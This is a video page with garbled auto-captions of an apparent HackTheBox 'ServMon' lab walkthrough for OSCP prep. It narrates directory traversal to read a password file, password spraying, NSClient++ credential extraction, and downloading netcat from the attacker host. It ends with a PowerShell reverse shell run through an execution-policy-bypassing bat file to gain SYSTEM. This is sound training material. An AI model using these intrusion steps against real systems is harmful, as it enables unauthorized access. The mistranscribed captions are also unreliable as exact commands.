Servmon - Hackthebox (OSCP Prep) - TJ Nulls

Video Statistics and Information

Video

Captions Word Cloud

Reddit Comments

Captions

hello I'm KNX Lans today I'm going to be doing surf modon why am I doing surveon doing serf modon because it's a part of TJ NOS list it's updated list for the ocp and I believe I'm going to be taking that it looks like it's already up and running so I'm going to clear that out knock that down and then we're going to start with our R scan like we normally do yes so our IP is Tim 129 22777 and coming back okay so we have a lot of ports open um while it's running the script scans or the default scripts and version enumeration we're going to go ahead and check out this port uh we're going to check out 80 as soon as I write this down cool let's go check this out uh actually what I have this in my clipboard don't I all right we should be better [Music] now on page o additionally while this is running we can also do we can also do go Buster we can run go Buster do some directory [Music] busting and let that go it is I was going to say it's probably it's taking a long time but it's probably taking a long time because I'm like hammering it with uh information I'm not not information but um running so much against it the MS scan and trying to access it what is this this equals rout RP login Js V uh we could do something like C go back buer found nothing server returner status code that matches oh continue please exclude the status code code or length which I think is is it exclude it's probably just exclude length 118 yeah exclude length 118 so surprised like nothing is coming back let's see if the scan finished it did okay let's do some stuff grab all of this mess all these ports and all this port information and po it in here um I'm actually going to make a new note call in map see what makes it look the nicest okay well that's nice and colorful let's see oh I need to close that tab a new tab FTP is open 810 129 227 77 us are logged in users naen and Nathan okay so FTP found or FTP has Anonymous login enabled and we located two users copy paste and naen Nathan let's look in here if we can holy crap we can I cat stuff cat confidential uh more confidental do text yes okay uh who was that that was naen nen has confidential. text file in uh nting share it contains this message to Nathan final transfer warning six bear Line Feed received asking need I left your password. text file on your desktop please remove this once you have edited yourself and place it back in your secure folder love that of course that's how we do things around here we um always always always always what does it not like my spelling maybe it doesn't like the dot text uhuh there's nenes and then let's look at Nathan um it back is it back is it is it it's like that yeah CD Nathan LS no CD Nathan trying to move too fast um more notes to do. text cannot find the file that because I don't know how to do it it is lock down the upload the password remove okay let's copy this out and actually read through it because what I did just then was pretend to read through it uh for your benefit and it is actually not going to benefit either of us the system cannot find the PATH this yeah uh-huh uh-huh let's just move that right out of there um notes on on to do change the password for nvms complete lock down the NS client access got it upload the passwords remove public access to nvms and place the secret files in SharePoint okay anything else here [Music] Nathan okay let's hop back over see what else we've got we know we have two users we can go back to 80 the web [Music] server let's see what's going on we could try something n EXA SSH no SMB 10 129 22777 [Music] for me try Nathan and password of user share wordless rock you that work is that going to work good not decode password file ignore password decoding you ignore have eight characters okay I oh man uh can I not have like can can you not show me output please uh yeah do not retrieve command output no output see what that does not what uh I wanted it to do there's something else on here right check skip right check on shares dump user targets um continue on success no Brute Force I do want to Brute Force I do I guess I want to continue on success I don't want any of this freaking output I guess it'll just stop if it finds something all right we'll let that run or Nathan his account uh if they have a lockout policy he is locked out for days nvms 1000 nvms 1000 let's look up exploits and we see a directory traversal kind of lines up with like what I was going to do here is that we see like JS with the V equals um where is it going to literally just a bunch of slashes moving up directories where is it checking is it just like the base config here like like this so Windows one I I is that what they oh oh no me go back and see what our yeah that's nothing's happening there I was look want to look at Go Buster but doesn't look like it found anything directory list T users how's it finding nothing so odd um word lless or buer what are we looking at medium list [Music] 418 imagine it's the login Nathan Nathan naen N happens if we choose another language nothing we just look at Pages what if we do that be a mess St High another directory [Music] reversal lot of directory traversal pile and they all seem that's this is like the same thing is it encoding in some way IP return URL is it this has a slash and it's also adding slash to the first character okay let's just that's not working we're going to go ahead and download this and then go to shot not that though this one okay I'm going to say that's not coming back with anything and we will go to up up and then seron uh make D dub dub dub and cd2 dubb dub Pon 3 mmsp we need 10 129 227 77 we want I don't know how to do I'm not sure okay uh windows I I I'm just literally just going to keep it the way that they were they had it did it actually grab it so what happens if we do users yeah users Nathan desktop what do they call the file change the password upload to the um oh password. text desktop password. text and then we'll call it passwords lowercase not text oh okay so I wonder if it's like the I wonder if it's the stop it stop that stop that stop all that I wonder if it's the user agent or specifically what it is in this that is allowing it to work um I got rid of it didn't I was this one this let's look at their request one reversal two we're setting the header setting a custom user agent we're setting the except to asterisk Aster refer is the site and then content equal to two and H May if I come back later uh or I feel like it will come back later and check this out so post is vulnerable to path [Music] traversal uh um and it was a cve wasn't it no yeah uh here it is awful lucky of uhy for us that they put all that information on their FTP server that allows Anonymous login okay let's get these into actually at passwords yeah right um so that means we can do SMB no we can do exactly what we were doing earlier netic Zack uh SMB 10 129 22777 T you Nathan tacp passwords do text no what about uh nine okay oh all right naen I'm sorry big sucks for you okay cool um and we used ntic Zac to uh password spray then exac password spray um found credentials and we were able to locate serve Manon n and then like big Like Big Butts at work I think that I think that's what that says like big butts at work you have to correct me in the comments you made it this far in go ahead and just comment like big butts at work just so I know just just you know just just so I know umm guess I didn't actually see if it was vulnerable here's what we can do here maybe um one let's see if we can log in now that we have some credentials maybe there's more information inside 18 okay never mind um SM be map 10 129 227 77 my clipboard like big butts at work me too no I don't that was that was a horrible joke [Music] um here we go what is this oh default share so not a whole lot what about ump at 10 129 22777 hopefully I still have her password in my clipboard copy pasta I mean okay there we go users oh same thing yeah okay that was worth a shot uh let's see what else we've got running High Windows ports NS client NS client Plus+ inis client Plus+ um 8443 Napster let's go check 8443 out 8 [Music] 443 okay um what other ports 80 22 that's H SS h n at 10 129 227 77 I'm so sure and here's her password okay so now um we SSH on to the Box SSH naen at 10 129 227 77 with password I Like Big Butts at work and uh dur because we're on Windows desktop sure we've got the users fog type user. text user flag flag cool um what else what else what else uh that let's see if that uh eight uh what was it was it 8443 look at that net stat Tacko net stat Taco listening 21 22 134 566 was that in our scan previously also actually I'm sure that it probably was 566 but yeah it was okay let's do this instead um let's SSH uh let me get my stuff pulled up for that SS [Music] proxy um now we've got we know that we can get an exit it's let's see so we'll listen on Port 8443 over Local Host 8443 and I think that is it right we just need to our but password and let's see I'm going to need to do 127.0 Z1 um actually let's exit out of this Let's do let's give up on that and we'll just see what we can find on where did he go wasn't it here that plus plus or something AG login nster here it is and as client Plus+ we can reach the internal Network I mean we are on it a I think I just copied that I did let's get this grab this back let's do I'm looking around copy pasta we have nothing let's go a hunting CD what is Rec data Rec data CD Rec data dur CD recorded [Music] info db. db3 me see oh light arm Rec infill primary key let's do net user Nathan N group groups n local group applicator power users get backup operators admins CD shared imagine this is the FTP users it is about users just random random users folder CD can I access administrator D ner oh because I'm in freaking users oh my god of course I can dur uh CD inet H access is denied okay what about CD program files and what you see this let's let's look this up and see if anything exists for it exploit privilege escalation uh exactly what we need to do is escalate privileges when NS client Plus+ is installed with web server enable low level privilege users have the ability to read the web administrator's password and clear text from the config file okay um let's check that out real fast grab pram files the CD NS client type bro client Plus+ type NS client. so then we should see some credentials in here and we do documented key um go yeah whatever enumeration we were able to locate locate located and client Plus+ uh folder uh config file configuration file with credentials there they are um along with a way to I found this whole exploit actually um what is it even doing it's log in and enable following modules including enable a startup and save config download netcat and evil. bat do the temp directory is it literally it's just telling us to do these things restart the computer and wait for the reverse shell uh I cannot do that what if we What If instead so W's face changed the password so let's check this out real fast exac SMB 10 129 227 77 tack you about type Ronnie Nathan t p yikes TP what tagp that password at dirty little password sharers okay that's where shot where the shot and scripting wait uh documented key what about um okay well let's just follow this for a second I thought maybe those would work um yeah there's that there's that these were in this path current password so secret I love that NP web dash dash password Dash Das display is password supposed to be the password oh wait what it just pulls out password okay log in and enable allowing modules how do I log in thing is even if we can't restart the computer but maybe we can restart I don't know the service a service uh CD this dur CD no temp make dur temp CD do temp what else can we do CD can do something like this can be opt solo proxy selfer solo CD po goo actually we need Windows Python 3 agent agent.exe go all the way down to Temp CD CD temp and we get we had a curl didn't we HTTP 10 10418 agent.exe Mao agent.exe yeah it might take a little bit um I need to pull up notes on Lolo let's see because we have to do a little bit of setup four like did it get it it did okay have to build the tunnel with here all T Lolo we have to build the interface whatever um we've already started the proxy server now I need to start agent need to make it 10 104 I am 118 connect to us get our call back you can see our session we'll select the session and then think it's as easy as saying start oh oh oh oh oh oh one of the most important things uh so the Lolo uses a special um port port number for local host so if you need to set up like set it so that you can access the local host on the victim machine this is how you'll do it pseudo IP route add 24132 um Dev leolo so now we should be able to access it there's a metal sploit [Music] module let's try this um Metate module see what happens also can I still access this okay I seem to be able to this is was this it okay [Music] options set our host to 10 129 227 77 set T set lhost to t zero what else do we need uh set password to this and I may need to change the r h yeah to 2401 uh is rport an option is rport an option it is O is this going to work run oh Mar is vulnerable we we we knew that addit external script name pyy beist reloading the application somehow magically and and it's taking it sweet time so yeah payload come on baby big money o unfortunate that this is not working let's see what else let's see what's in here um a did I kill my [Music] tunnel I can't can't tell I didn't kill the tunnel here we go uh what does this say where does it go was that this [Music] one okay um we need a bat file um let's it exit out of that clear it off SSH um Medina at 129 22777 and her password was like big butts at work what n that's your password oh there we go much better all right let's CD do c tempter Okay so we've got couple things in here I guess I never ended up getting netcat on here um so let's try do that uh Python 3 D desktop uh curl HTTP what 10 10 14 118 n cat.exe to neexe sir and there it is um we can. exe 10 10 14 118 C mvlp 9,1 back that actually might just work let's see not recognized as an internal command C temp not recognized as an internal command internal or external command what's we're in it right like sure sure let's get it what something's getting rid of [Music] it okay uhhuh the file contains a virus or pup um so we need to bypass antivirus what about like a power shell reverse shell I'm try test. PS1 out to test. [Music] PS1 see how long this lasts help me okay let's back setting scripts scripts um see add a new script scripts scripts scripts settings external oh these are settings external script scripts power shell e Powershell [Music] value um desktop PS1 and then we'll save it though it should have already been saved queries um reload Rel restarting please wait while we restart exploit one. bat what is the the is exploit one not bad like external scripts is can't tell if it's working okay so apparently I crashed the Box um it's going to be half a second for you but I'm going to go to bed because I need to restart the box and it's late and I don't want to have to uh get back to uh where I was so anyway I will see you in half a second all right team I'm here to tell you this took significantly longer than it needed to um okay so let's let's start from the top so I've just gotten back in and the way this works the way the exploit Works um because I had to do testing before um I tried live again because it was just taking way too long anyway let me show you what I have here um type test. PS1 actually you can see type test.bat uh cat test.bat Okay so I have have uh a Powers shell file that is a reverse shell okay I called it test. PS1 you can see it down here you can see the contents of test. PS1 here um we've got the proxy running um and then you can also see a bat file which I don't have on here yet do I oh okay I do there it is okay so yeah create the bat file here's how we have to do it so execution so you can't run scripts by default we have to bypass the execution policy so um we needed a way to both bypass the execution policy and then run a file so here's how we're doing it in the bat file we're saying powershell.exe so start Powershell execution policy bypass you could do powershell.exe D bypass same thing Windows style hidden non-interactive so we're not getting any kind of pop-ups that tell us to accept uh no logo and then file C temp test test. PS1 here it is right here you have to have the full path we're in cm and we're going to run test. PS1 from there once we've we've logged in we're on settings we're opening in settings external scripts scripts and then from here we would create a new one at this section section you're going to call it whatever you want I called mine Powershell yikes uh for no reason Powershell um the key command and then the value is a location uh temp test. PS1 all right and then you're going to add it then it's going to appear down here um where you'll see it so here's the key value right and then there's the command that it's going to execute um once you have this and you've saved it you're going to click control because remember we have to restart the service um we can't do that I couldn't do that so we can restart the whole thing right so control reload it's going to reload uh the service for us and then we're going to click on queries from queries we'll go to Powershell and then we can run the task on our own so instead of creating a schedule task um which I believe is what this yes yeah this mentions creating a scheduled task that checks every minute and runs a command we're not going to do it that way we're going to run from the queries tab the Powershell script that we just had we're going to run the the Powershell command which if you know it was CM uh CM test.bat if we have a netcat listener running so let's clear this out netcat nvp you can already see that it tried to run the script so if we run this we get a call back and we say who am I we're in Authority system okay oh man wow um that was rough that was really rough it doesn't seem rough but it took a lot of finagling um a lot of messing around r. text um awesome Epic there we go all right team good job you did fantastic did fantastic you can do this as well you have questions put them in the comment section down below I will see you later have a good day

Info

Channel: NoxLumens

Views: 943

Rating: undefined out of 5

Keywords: noxlumens, noxlumen, hacking, cyber security, oscp, oscp prep, kali linux, hacker, cyber, malware, active directory, pentesting, web app pentesting, network pentesting, ctf, cyber ctf, offsec, offsec oscp, offsec proving grounds, gobuster, ad pentesting, ad pentest, active directory pentesting, enumeration, hackthebox, netexec, tjnulls, tj nulls oscp, hackthebox servmon, ligolo-ng, ssh port forward, netclient++, how to hack, how to be a hacker, hacking for beginners

Id: AHA0CaY0cxc

Channel Id: undefined

Length: 55min 43sec (3343 seconds)

Published: Tue Mar 05 2024